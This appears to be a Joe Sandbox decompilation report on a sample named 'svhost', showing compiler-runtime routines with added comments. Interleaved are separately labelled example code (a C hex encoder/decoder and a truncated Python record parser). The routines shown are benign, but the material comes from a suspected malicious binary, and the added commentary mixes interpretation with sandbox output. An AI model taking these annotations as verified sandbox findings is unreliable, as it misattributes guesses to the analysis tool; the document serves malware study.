                                      									E00EB6A58(_t91, _t96);
                                      									L37:
                                      								}
                                      							}
                                      						}
                                      						goto L38;
                                      					}
                                      					_t28 = _t96 + 0x18; // 0xeba1b7
                                      					E00EA1270(_t93, _t28, _t93, 0x101);
                                      					_t60 = _v32 * 0x30;
                                      					__eflags = _t60;
                                      					_v36 = _t60;
                                      					_t61 = _t60 + 0xeef880;
                                      					_v32 = _t61;
                                      					do {
                                      						__eflags =  *_t61;
                                      						_t85 = _t61;
                                      						if( *_t61 != 0) {
                                      							while(1) {
                                      								_t66 = _t85[1];
                                      								__eflags = _t66;
                                      								if(_t66 == 0) {
                                      									break;
                                      								}
                                      								_t92 =  *_t85 & 0x000000ff;
                                      								_t67 = _t66 & 0x000000ff;
                                      								while(1) {
                                      									__eflags = _t92 - _t67;
                                      									if(_t92 > _t67) {
                                      										break;
                                      									}
                                      									__eflags = _t92 - 0x100;
                                      									if(_t92 < 0x100) {
                                      										_t34 = _t93 + 0xeef868; // 0x8040201
                                      										 *(_t96 + _t92 + 0x19) =  *(_t96 + _t92 + 0x19) |  *_t34;
                                      										_t92 = _t92 + 1;
                                      										__eflags = _t92;
                                      										_t67 = _t85[1] & 0x000000ff;
                                      										continue;
                                      									}
                                      									break;
                                      								}
                                      								_t85 =  &(_t85[2]);
                                      								__eflags =  *_t85;
                                      								if( *_t85 != 0) {
                                      									continue;
                                      								}
                                      								break;
                                      							}
                                      							_t61 = _v32;
                                      						}
                                      						_t93 = _t93 + 1;
                                      						_t61 = _t61 + 8;
                                      						_v32 = _t61;
                                      						__eflags = _t93 - 4;
                                      					} while (_t93 < 4);
                                      					 *(_t96 + 4) = _t79;
                                      					 *((intOrPtr*)(_t96 + 8)) = 1;
                                      					 *((intOrPtr*)(_t96 + 0x21c)) = E00EB6944(_t79);
                                      					_t46 = _t96 + 0xc; // 0xeba1ab
                                      					_t86 = _t46;
                                      					_t91 = _v36 + 0xeef874;
                                      					_t94 = 6;
                                      					do {
                                      						_t64 =  *_t91;
                                      						_t91 = _t91 + 2;
                                      						 *_t86 = _t64;
                                      						_t49 = _t86 + 2; // 0x8babab84
                                      						_t86 = _t49;
                                      						_t94 = _t94 - 1;
                                      						__eflags = _t94;
                                      					} while (_t94 != 0);
                                      					goto L9;
                                      				}
                                      				L38:
                                      				return E00E89A35(_t79, _v8 ^ _t97, _t90, _t93, _t96);
                                      			}

                                      APIs
                                        • Part of subcall function 00EB6982: GetOEMCP.KERNEL32(00000000,00EB6BF4,00EBA19F,00000000,00000000,00000000,00000000,?,00EBA19F), ref: 00EB69AD
                                      • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00EB6C3B,?,00000000,00EBA19F,558B0000,?,?,?,?,00000000), ref: 00EB6E4B
                                      • GetCPInfo.KERNEL32(00000000,;l,?,?,00EB6C3B,?,00000000,00EBA19F,558B0000,?,?,?,?,00000000,00000000), ref: 00EB6E8D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CodeInfoPageValid
                                      • String ID: ;l
                                      • API String ID: 546120528-353426666
                                      • Opcode ID: 3a96aff284a5bbc07e8b2e40d5aaa849eed223b0b9c48d05259a22d8767b3398
                                      • Instruction ID: faac3e193df8d0ad02ea66b5457318f87b57f7f024aa6dce4bb7aff69118ce37
                                      • Opcode Fuzzy Hash: 3a96aff284a5bbc07e8b2e40d5aaa849eed223b0b9c48d05259a22d8767b3398
                                      • Instruction Fuzzy Hash: 86513475A002459EDB20CF75D4406FBBBF5FF51308F14606EE096AB2A1D739DA46CB90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 80%
                                      			E00E62190(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, intOrPtr _a4, char _a8) {
                                      				// Hex-encodes the byte buffer passed in _a8 and stores the resulting string into _a4.
                                      				// __ecx (this) is saved but not otherwise used. The pushes of 0xffffffff / 0xec0e50 /
                                      				// fs:[0] and the XOR with the global at 0xeef074 are the standard MSVC SEH frame and
                                      				// /GS stack-cookie prologue; E00E89A35 at the end is the matching cookie check.
                                      				char _v16;
                                      				signed int _v20;
                                      				char _v44;
                                      				signed int _v45;
                                      				intOrPtr _v52;
                                      				signed int _v56;
                                      				intOrPtr _v60;
                                      				signed int _t30;
                                      				signed int _t31;
                                      				intOrPtr _t45;
                                      				intOrPtr _t47;
                                      				signed int _t76;
                                      
                                      				_t75 = __esi;
                                      				_t74 = __edi;
                                      				_t49 = __ebx;
                                      				_push(0xffffffff);
                                      				_push(0xec0e50);                         // SEH handler / scope table for this frame
                                      				_push( *[fs:0x0]);
                                      				_t30 =  *0xeef074; // 0x221cac15          // __security_cookie
                                      				_t31 = _t30 ^ _t76;
                                      				_v20 = _t31;                             // cookie ^ ebp, checked on return
                                      				_push(_t31);
                                      				_t2 =  &_v16; // 0xe620e3
                                      				 *[fs:0x0] = _t2;
                                      				_v60 = __ecx;
                                      				_t4 =  &_a8; // 0xe620e3
                                      				_v56 = E00E57A20( *_t4);                 // length of the input buffer
                                      				E00E636D0( &_v44);                       // construct the temporary output string
                                      				E00E63300(__ebx,  &_v44, __edi, __esi, _v56 << 1);   // reserve two output chars per input byte
                                      				_v52 = 0;
                                      				while(_v52 < _v56) {
                                      					asm("lfence");                       // speculation barrier after the bounds check, typical of /Qspectre builds
                                      					_t15 =  &_a8; // 0xe620e3
                                      					_v45 =  *((intOrPtr*)(E00E634C0( *_t15, _v52)));   // byte at index _v52 (element accessor)
                                      					_t45 =  *0xee52e0; // 0xee5284           // pointer to a 16-entry nibble-to-char table
                                      					E00E633C0(_t49,  &_v44, _t74, _t75,  *(_t45 + ((_v45 & 0x000000ff) >> 4)) & 0x000000ff);   // append table[high nibble]
                                      					_t47 =  *0xee52e0; // 0xee5284
                                      					E00E633C0(_t49,  &_v44, _t74, _t75,  *(_t47 + (_v45 & 0xf)) & 0x000000ff);               // append table[low nibble]
                                      					_v52 = _v52 + 1;
                                      				}
                                      				E00E57F70(_a4, E00E51650( &_v44));       // copy the temporary's characters into the caller's string (_a4)
                                      				E00E57F50( &_v44);                       // destroy the temporary
                                      				_t27 =  &_v16; // 0xe620e3
                                      				 *[fs:0x0] =  *_t27;
                                      				return E00E89A35(_t49, _v20 ^ _t76,  &_v44, _t74, _t75);   // __security_check_cookie + epilogue
                                      			}
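The routine above is a nibble-table hex encoder: two output characters per input byte, high nibble first. As an added example, not code from the sample or from Joe Sandbox, the following plain-C re-implementation reproduces that logic and adds the matching decoder an analyst needs to turn such output (for instance a hex-encoded identifier found in a dropped file) back into bytes. The 16-byte table the sample reads through the pointer at 0xee52e0 is not dumped in the report, so lowercase hex digits are an assumption here; the decoder accepts both cases for that reason.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Assumed contents of the sample's 16-entry nibble table (not shown in the
 * report); any 16 distinct characters would work with the same encoder. */
static const char NIBBLE_TABLE[16] = "0123456789abcdef";

/* Mirrors E00E62190: for each input byte emit table[b >> 4], then table[b & 0xf].
 * out must have room for 2*len + 1 bytes. Returns the number of characters written. */
size_t hex_encode(const uint8_t *in, size_t len, char *out)
{
    size_t o = 0;
    for (size_t i = 0; i < len; i++) {
        uint8_t b = in[i];
        out[o++] = NIBBLE_TABLE[b >> 4];
        out[o++] = NIBBLE_TABLE[b & 0x0f];
    }
    out[o] = '\0';
    return o;
}

/* Reverse lookup; -1 for a character outside the assumed table. Upper-case
 * digits are accepted too, since the real table might use them. */
static int nibble_value(char c)
{
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/* Decodes a hex string back into bytes. Returns the byte count, or -1 on odd
 * length, invalid character, or insufficient output capacity. */
long hex_decode(const char *hex, uint8_t *out, size_t out_cap)
{
    size_t n = strlen(hex);
    if (n % 2 != 0 || n / 2 > out_cap) return -1;
    for (size_t i = 0; i < n; i += 2) {
        int hi = nibble_value(hex[i]);
        int lo = nibble_value(hex[i + 1]);
        if (hi < 0 || lo < 0) return -1;
        out[i / 2] = (uint8_t)((hi << 4) | lo);
    }
    return (long)(n / 2);
}

int main(void)
{
    /* Constructed input for demonstration; not data taken from the sample. */
    const uint8_t sample[] = { 0x00, 0x7f, 0x80, 0xff, 0x41 };
    char hex[2 * sizeof sample + 1];
    uint8_t back[sizeof sample];

    hex_encode(sample, sizeof sample, hex);
    printf("encoded: %s\n", hex);                 /* 007f80ff41 */

    long n = hex_decode(hex, back, sizeof back);
    printf("decoded %ld bytes, round-trip %s\n", n,
           (n == (long)sizeof sample && memcmp(back, sample, sizeof sample) == 0) ? "ok" : "FAILED");
    return 0;
}
```

To confirm the identification against the live sample, break on E00E62190 in a debugger, note the buffer and length passed via _a8, and compare the string written to _a4 with hex_encode over the same bytes; a mismatch means the table at 0xee52e0 is not plain hex and should be dumped.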

                                      Instruction addresses 0x00e62190 to 0x00e62276 (per-instruction disassembly column not captured in this export)

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: task
                                      • String ID: $
                                      • API String ID: 1384045349-618146705
                                      • Opcode ID: c377881260c3a0bd0f1091c274caaed82e153c605beab0222bda9c7f4ce672f5
                                      • Instruction ID: f944d660c27c3238b5b67e9ee258dc571610fdc3d5a7e16a317c528ab2b7454b
                                      • Opcode Fuzzy Hash: c377881260c3a0bd0f1091c274caaed82e153c605beab0222bda9c7f4ce672f5
                                      • Instruction Fuzzy Hash: 96216071944158AFCB05EFA4E891EEEBBB5FF08310F045569F5567B291DF306A04CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 75%
                                      			E00E58E60(intOrPtr __ecx) {
                                      				// Releases the storage of a string object reached through *this (E00E51100 returns it).
                                      				// The field layout (buffer at +0, size at +0x10, capacity at +0x14, capacity reset to 7,
                                      				// a 2-byte null written afterwards) is that of MSVC's std::basic_string<wchar_t>, so this
                                      				// is the _Tidy_deallocate pattern: free the heap buffer if one is in use, then return the
                                      				// object to its empty small-string state. The FLIRT names in the APIs list below
                                      				// (GetWorkQueueIdentity, allocator) are debug-CRT signature matches and may be false hits.
                                      				char _v16;
                                      				char _v18;
                                      				char _v24;
                                      				intOrPtr _v28;
                                      				intOrPtr _v32;
                                      				intOrPtr _v36;
                                      				signed int _t26;
                                      				void* _t35;
                                      				signed int _t61;
                                      				void* _t62;
                                      				void* _t63;
                                      
                                      				_push(0xffffffff);
                                      				_push(0xec0670);                         // SEH frame (see E00E62190 for the same prologue)
                                      				_push( *[fs:0x0]);
                                      				_t63 = _t62 - 0x14;
                                      				_t26 =  *0xeef074; // 0x221cac15          // __security_cookie
                                      				_push(_t26 ^ _t61);
                                      				 *[fs:0x0] =  &_v16;
                                      				_v28 = __ecx;                            // this
                                      				E00E595B0(_v28);
                                      				_v24 = E00E51100(_v28);                  // pointer to the string object
                                      				_t6 =  &_v24; // 0xe57b4f
                                      				if((E00E59F80( *_t6) & 0x000000ff) != 0) {   // true when the string owns a heap buffer
                                      					_t7 =  &_v24; // 0xe57b4f
                                      					_v36 =  *((intOrPtr*)( *_t7));      // heap buffer pointer
                                      					_v32 = E00E56580(_v28);              // allocator
                                      					_t11 =  &_v24; // 0xe57b4f
                                      					_push(E00E51650( *_t11));
                                      					_push(_v32);
                                      					E00E524A0(_t38);
                                      					_t63 = _t63 + 0xc;
                                      					_t13 =  &_v24; // 0xe57b4f
                                      					E00E5A150(_v32, _v36,  *((intOrPtr*)( *_t13 + 0x14)) + 1);   // deallocate(buffer, capacity + 1)
                                      				}
                                      				_t17 =  &_v24; // 0xe57b4f
                                      				 *((intOrPtr*)( *_t17 + 0x10)) = 0;      // size = 0
                                      				_t19 =  &_v24; // 0xe57b4f
                                      				 *((intOrPtr*)( *_t19 + 0x14)) = 7;      // capacity = 7 (wchar_t small-string buffer)
                                      				_v18 = 0;                                // null wchar_t
                                      				_t23 =  &_v24; // 0xe57b4f
                                      				_t35 = E00E5A0A0(0 +  *_t23,  &_v18);    // write the terminator into the in-object buffer
                                      				 *[fs:0x0] = _v16;
                                      				return _t35;
                                      			}

                                      Instruction addresses 0x00e58e63 to 0x00e58f2c (per-instruction disassembly column not captured in this export)

                                      APIs
                                      • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00E58E8B
                                      • allocator.LIBCPMTD ref: 00E58EE7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Base::Concurrency::details::ContextIdentityQueueWorkallocator
                                      • String ID: O{
                                      • API String ID: 2135583291-3566007747
                                      • Opcode ID: 209ae22af78de41667c448ecf205f35b96c0393faa52449ce67b375440007648
                                      • Instruction ID: 862f3557485010034d69674f3aa582111d7fbfc8118d6308d616421d83b02d73
                                      • Opcode Fuzzy Hash: 209ae22af78de41667c448ecf205f35b96c0393faa52449ce67b375440007648
                                      • Instruction Fuzzy Hash: F9213CB1E001099BCB08EFA4D942BAFB7F5FB48305F104569E905B7391EB35A904CBA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 82%
                                      			E00E56C40(void* __eflags, intOrPtr _a4) {
                                      				// Constructor (this in ecx) for an object of about 0x7c bytes: vtable, reference count
                                      				// set to 1, an exception_ptr, a mutex at +0x14, a condition_variable at +0x44, a block
                                      				// of status flags at +0x6c..+0x76, and a caller-supplied pointer at +0x78. Together with
                                      				// the APIs listed below (std::exception_ptr, std::_Mutex_base, std::condition_variable)
                                      				// this layout matches the shared state behind a std::future (MSVC's std::_Associated_state).
                                      				char _v8;
                                      				char _v16;
                                      				char _v20;
                                      				void* __ecx;
                                      				signed int _t28;
                                      				char _t38;
                                      				signed int _t53;
                                      
                                      				_push(0xffffffff);
                                      				_push(0xec04f6);                         // SEH frame
                                      				_push( *[fs:0x0]);
                                      				_push(_t38);
                                      				_t28 =  *0xeef074; // 0x221cac15          // __security_cookie
                                      				_push(_t28 ^ _t53);
                                      				 *[fs:0x0] =  &_v16;
                                      				_v20 = _t38;                             // this
                                      				_t3 =  &_v20; // 0xe5e433
                                      				 *((intOrPtr*)( *_t3)) = 0xee517c;       // vtable pointer
                                      				_t4 =  &_v20; // 0xe5e433
                                      				 *((intOrPtr*)( *_t4 + 4)) = 1;          // reference count
                                      				E00E51390();                             // std::exception_ptr::exception_ptr (see APIs)
                                      				_v8 = 0;                                 // EH unwind state: exception_ptr now constructed
                                      				_t8 =  &_v20; // 0xe5e433
                                      				E00E52200( *_t8 + 0x14);                 // std::mutex at +0x14 (std::_Mutex_base::_Mutex_base)
                                      				_v8 = 1;                                 // EH unwind state: mutex now constructed
                                      				_t10 =  &_v20; // 0xe5e433
                                      				E00E52220( *_t10 + 0x44);                // std::condition_variable at +0x44
                                      				_t11 =  &_v20; // 0xe5e433
                                      				 *((char*)( *_t11 + 0x6c)) = 0;          // status flags zeroed
                                      				_t13 =  &_v20; // 0xe5e433
                                      				 *((intOrPtr*)( *_t13 + 0x70)) = 0;
                                      				_t15 =  &_v20; // 0xe5e433
                                      				 *((char*)( *_t15 + 0x74)) = 0;
                                      				_t17 =  &_v20; // 0xe5e433
                                      				 *((char*)( *_t17 + 0x75)) = 0;
                                      				_t19 =  &_v20; // 0xe5e433
                                      				 *((char*)( *_t19 + 0x76)) = 0;
                                      				_t21 =  &_v20; // 0xe5e433
                                      				 *((intOrPtr*)( *_t21 + 0x78)) = _a4;    // caller-supplied pointer stored last
                                      				_v8 = 0xffffffff;                        // leave the EH scope
                                      				_t25 =  &_v20; // 0xe5e433
                                      				 *[fs:0x0] = _v16;
                                      				return  *_t25;                           // returns this
                                      			}

                                      Instruction addresses 0x00e56c43 to 0x00e56cec (per-instruction disassembly column not captured in this export)

                                      APIs
                                      • std::exception_ptr::exception_ptr.LIBCONCRTD ref: 00E56C7F
                                        • Part of subcall function 00E52200: std::_Mutex_base::_Mutex_base.LIBCONCRTD ref: 00E5220C
                                      • std::condition_variable::condition_variable.LIBCONCRTD ref: 00E56CA0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Mutex_baseMutex_base::_std::_std::condition_variable::condition_variablestd::exception_ptr::exception_ptr
                                      • String ID: 3
                                      • API String ID: 12386501-3930663615
                                      • Opcode ID: dc4546cfe475a2998e03937fb638744beb0b251f3a38289a076cfe3267bbd8e2
                                      • Instruction ID: fc76ac4f9bf8ac15567adae5cd699b3953c9219c8a1aaa30d31444db5c990f05
                                      • Opcode Fuzzy Hash: dc4546cfe475a2998e03937fb638744beb0b251f3a38289a076cfe3267bbd8e2
                                      • Instruction Fuzzy Hash: B221FCB4904259DFDB04DF98C850BAFBBF4FB45314F10469CE8216B392C775A905CBA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 82%
                                      			E00E724A0(void* __eflags, char _a4) {
                                      				// Builds a std::future_error from the error code pointed to by _a4 and throws it via
                                      				// _CxxThrowException (E00EA0C81); the int3 after the throw is unreachable padding,
                                      				// and the "return" that follows it is decompiler fall-through into the next function.
                                      				char _v24;
                                      
                                      				_t1 =  &_a4; // 0xe5686b
                                      				_t6 =  *_t1;
                                      				_t11 =  &_v24;
                                      				E00E72408( &_v24,  *((intOrPtr*)( *_t1)),  *((intOrPtr*)(_t6 + 4)));   // std::future_error::future_error
                                      				E00EA0C81( &_v24, 0xeead54);             // __CxxThrowException@8 with the throw-info at 0xeead54
                                      				asm("int3");
                                      				return E00E54EB0(_t11,  *((intOrPtr*)(_t11 + 0xc)));
                                      			}

                                      Instruction addresses 0x00e724a3 to 0x00e724ce (per-instruction disassembly column not captured in this export)

                                      APIs
                                      • std::future_error::future_error.LIBCPMT ref: 00E724B1
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00E724BF
                                        • Part of subcall function 00EA0C81: RaiseException.KERNEL32(?,?,?,00E8A8C2,?,?,?,?,?,?,?,?,00E8A8C2,?,00EEC1B4), ref: 00EA0CE1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExceptionException@8RaiseThrowstd::future_error::future_error
                                      • String ID: kh
                                      • API String ID: 1079043900-2724299894
                                      • Opcode ID: 78ec3d3904aae0c99a5ad0074d9c320bcd785c6389ddf887eb09a57c601a0deb
                                      • Instruction ID: af43d1e043c48a720400f502d843efa10de4ff77f9bf76391fd2eb88937f4f49
                                      • Opcode Fuzzy Hash: 78ec3d3904aae0c99a5ad0074d9c320bcd785c6389ddf887eb09a57c601a0deb
                                      • Instruction Fuzzy Hash: 9DD0127140010D9A8B01FB94D906C997BEAAB04305B209454B9053A562DB21F9599652
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 68%
                                      			E00E72801(intOrPtr _a4) {
                                      				// Constructs a std::bad_exception-derived object from _a4 and throws it; the int3 and
                                      				// the "bad function call" string that the decompiler shows as a return value belong to
                                                            				// the following code (std::bad_function_call's what() text), not to this function's flow.
                                      				char _v16;
                                      
                                      				E00E51AE0( &_v16, _a4);                  // std::bad_exception::bad_exception
                                      				E00EA0C81( &_v16, 0xeeda64);             // __CxxThrowException@8 with the throw-info at 0xeeda64
                                      				asm("int3");
                                      				return "bad function call";
                                      			}

                                      Instruction addresses 0x00e7280d to 0x00e72826 (per-instruction disassembly column not captured in this export)

                                      APIs
                                      • std::bad_exception::bad_exception.LIBCMTD ref: 00E7280D
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00E7281B
                                        • Part of subcall function 00EA0C81: RaiseException.KERNEL32(?,?,?,00E8A8C2,?,?,?,?,?,?,?,?,00E8A8C2,?,00EEC1B4), ref: 00EA0CE1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExceptionException@8RaiseThrowstd::bad_exception::bad_exception
                                      • String ID: bad function call
                                      • API String ID: 1843230569-3612616537
                                      • Opcode ID: 19df2972b7324e32b8a4698aff4d9438d806486ce2e3c59fcf83831ff1ce8807
                                      • Instruction ID: e819569bec684e80aeb321b97a8b084cc965ac14ea167886965025e311615f1b
                                      • Opcode Fuzzy Hash: 19df2972b7324e32b8a4698aff4d9438d806486ce2e3c59fcf83831ff1ce8807
                                      • Instruction Fuzzy Hash: 2FC01278D0820C77CF00FAE4D917D8D77BC5A04340B806564BD24B7085DAB0A71D86C4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00E53660() {
                                      				char _v16;
                                      
                                      				// builds the exception object with the message below, then throws it through
                                      				// E00EA0C81, which the APIs list resolves to __CxxThrowException -> RaiseException
                                      				E00E52560( &_v16, "This function cannot be called on a default constructed task");
                                      				return E00EA0C81( &_v16, 0xeedb2c);
                                      			}




                                      Listing addresses: 0x00e5366e, 0x00e53684

                                      APIs
                                      • std::bad_exception::bad_exception.LIBCMTD ref: 00E5366E
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00E5367C
                                        • Part of subcall function 00EA0C81: RaiseException.KERNEL32(?,?,?,00E8A8C2,?,?,?,?,?,?,?,?,00E8A8C2,?,00EEC1B4), ref: 00EA0CE1
                                      Strings
                                      • This function cannot be called on a default constructed task, xrefs: 00E53666
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExceptionException@8RaiseThrowstd::bad_exception::bad_exception
                                      • String ID: This function cannot be called on a default constructed task
                                      • API String ID: 1843230569-3567850458
                                      • Opcode ID: 6c69a0ccd85c714d391eb674009446ddecd0a3936eedce7f5f3de453b2734c3b
                                      • Instruction ID: 6efb3ab381d44dc485fa48ba9392be1073e076f069fb47d1efb3a857b824d875
                                      • Opcode Fuzzy Hash: 6c69a0ccd85c714d391eb674009446ddecd0a3936eedce7f5f3de453b2734c3b
                                      • Instruction Fuzzy Hash: D2C01236E4430C62CA00F6A0AD03999B3AC9911700B4022A9BE147A282BAE17A1982D6
                                      Uniqueness

                                      Uniqueness Score: -1.00%
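Both records above are compiler-runtime thunks (CRT exception constructors and __CxxThrowException) rather than the sample's own logic, and a report of this size contains thousands of such records. The following Python is an added example, not part of the Joe Sandbox report and not Joe Sandbox tooling: it parses one per-function record (the layout, headers and bullet format are copied from the E00E53660 record above) into a structure an analyst can filter and pivot on, and flags records whose directly referenced APIs all come from statically linked CRT libraries. The field names, the RUNTIME_LIBS set and the is_runtime_boilerplate() heuristic are assumptions made for this example; the sample record is constructed from the page text with the Memory Dump Source and IDA Plugin sections omitted.

```python
"""Parse Joe Sandbox per-function decompile records into structured data.

Added example, not part of the Joe Sandbox report and not Joe Sandbox tooling.
The record layout is copied from the records on the page; the dataclass
fields, RUNTIME_LIBS and is_runtime_boilerplate() are this example's own
assumptions.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Constructed sample: the E00E53660 record from the page, with the
# Memory Dump Source / IDA Plugin sections left out.
SAMPLE_RECORD = """\
C-Code - Quality: 100%
            E00E53660() {
                char _v16;

                E00E52560( &_v16, "This function cannot be called on a default constructed task");
                return E00EA0C81( &_v16, 0xeedb2c);
            }

APIs
• std::bad_exception::bad_exception.LIBCMTD ref: 00E5366E
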